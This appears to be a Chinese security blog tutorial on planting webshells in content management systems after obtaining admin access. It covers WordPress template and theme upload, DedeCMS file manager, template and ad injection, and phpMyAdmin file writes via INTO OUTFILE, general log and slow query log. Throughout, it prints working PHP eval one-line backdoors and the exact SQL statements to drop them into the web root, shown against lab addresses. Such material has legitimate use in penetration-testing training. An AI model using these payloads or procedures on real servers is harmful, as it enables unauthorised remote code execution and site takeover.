cms 内容管理系统漏洞类型

『我非』◈正常人

已于 2024-08-13 20:36:06 修改

阅读量836

点赞数 19

文章标签：安全

于 2024-08-13 20:35:32 首次发布

本文链接：https://blog.csdn.net/qq_56610060/article/details/141173167

版权

概述
通过注入或者其他途径，获取网站管理员账号和密码后，找到后台登录地址，登录后寻找后台漏洞上传网页后门，获取网站的webshell；

一：WordPress

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截至2018年4月，排名前1000万的网站中超过30.6%使用WordPress。 WordPress是最受欢迎的网站内容管理系统。全球有大约30%的网站(7亿5000个)都是使用 WordPress架设网站的。WordPress是目前因特网上最流行的博客系统。WordPress在最著名的网络发布阶段中脱颖而出。如今，它被使用在超过7000万个站点上。

后台修改模板拿WebShell

站点搭建之后进行安装基础信息随便写，然后登录
进入后台当中》外观》编辑选项》404.php
写入一句话木马 <?php phpinfo();eval($_POST['cmd']);?> 更新

访问以下连接即可获取WebShell…
#拼接路径 /wp-content/themes/twentyfifteen/404.php
#访问连接 http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php 可连

上传主题拿WebShell

步骤一：接着上一个环境使用…将带有后门的文件加入到主题中并将主题压缩为ZIP文件…点击【外观】–》【主题】–》【添加】–》》【上传主题】–》【浏览】–》【现在安装】
主题文件: shell.zip

连接
http://ip:8080/wp-content/themes/shell/cmd.php

kali自带工具 wpscan

二：DeDeCMS

DedeCMS是织梦团队开发PHP 网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方门户、行业门户、政府及企事业站点等

通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为dedecms后台可以直接上传任意文件，可以通过文件管理器上传php文件获取webshell…
后台：http://127.0.0.1/DedeCMS/uploads/dede/index.php
#信息：自己设置的比如我设置的
username:admin
password:123456
步骤二：登陆到后台点击【核心】–》【文件式管理器】–》【文件上传】将准备好的一句话代码上传…OK

步骤三：访问上传成功后的文件并连接测试…
地址：http://127.0.0.1/DedeCMS/uploads/uploads/shell.php

修改模板文件拿WebShell

步骤一：与WPCMS类似，直接修改模板拿WebShell…点击【模板】–》【默认模板管理】–》【index.htm】–> 【修改】在文件修改中添加一句话代码…如下

步骤二：点击【生成】–》【更新主页HTML】–》将主页位置修改为【…/index.php】–》点击【生成静态】–》点击【更新主页】再次访问站点首页可发现变化.

连接测试.
#地址 http://127.0.0.1/DedeCMS/uploads/index.php

后台任意命令执行拿WebShell

步骤一：点击【模块】–》【广告管理】–》【增加一个新广告】–》在【广告内容】处添加一句话代码–》点击【确定】

连接测试

三、Joomla未授权访问漏洞(CVE-2023-23752)

四：PhPMyadmin

PHPMyadmin是一个以PHP为基础的MySQL数据库管理工具，使网站管理员可通过Web接口管理数据库。

into outfile写马

select @@basedir; 查找mysql安装路径

show global variables like ‘%secure_file_priv%’;

select '<?php @eval($_POST[a]);?>'INTO OUTFILE ‘E:/phpstudy_pro/www/644.php’

开启日志写马getshell

SHOw VARIABLES LIKE ‘general%’; # 查看general_log 是否开启
set global general_log = “oN”;#开启

set global general_log_file=‘E:/phpstudy_pro/www/456.php’;

select ‘<?php eval($_POST["aaa"]);?>’;

测试：
127.0.0.1/456.php

慢查询we bshell

show variables like ‘%slow%’

set global slow_query_log=on;

set global slow_query_log_file=‘E:/phpstudy_pro/WWW/slow.php’ select '<?php eval($_POST["pwd"]);?>
select ‘<?php phpinfo();?>’ or sleep(30); 间隔30秒

创建数据库和表写入webshell

建库建表

插入数据一句话木马

CREATE TABLE test( id text(500) not null);

INSERT INTO test (id) VALUES(‘<?php @eval($_POST[cmd]);?>’);

SELECT id FROM len INTO OUTFILE ‘E:/phpstudy_pro/WWW/300.php’;

DROP TABLE IF EXISTS test；
phpinfo()